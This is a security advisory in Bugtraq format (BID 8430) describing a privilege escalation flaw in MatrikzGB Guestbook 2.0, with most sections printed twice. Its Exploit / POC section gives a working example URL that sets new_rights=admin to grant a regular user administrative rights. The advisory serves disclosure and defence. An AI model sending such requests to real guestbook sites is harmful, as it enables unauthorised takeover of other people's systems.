MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
BID:8430
Info
MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
| Bugtraq ID: | 8430 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 16 2003 12:00AM |
| Updated: | Aug 16 2003 12:00AM |
| Credit: | Discovery is credited to Stephan S. <[email protected]>. |
| Vulnerable: |
MatrikzGB Guestbook 2.0 |
| Not Vulnerable: | |
Discussion
MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users to gain administrative rights. It is possible to exploit this issue by manipulating URI parameters.
MatrikzGB Guestbook is prone to a vulnerability that may permit guestbook users to gain administrative rights. It is possible to exploit this issue by manipulating URI parameters.
Exploit / POC
MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
This issue may be exploited with a web browser. The following example was provided:
http://www.example.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
where regularuser and regularpass equal the user credentials of the attacker.
This issue may be exploited with a web browser. The following example was provided:
http://www.example.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
where regularuser and regularpass equal the user credentials of the attacker.
Solution / Fix
MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MatrikzGB Guestbook Administrative Privilege Escalation Vulnerability
References:
References:
- Security hole in MatrikzGB (Stephan S.
)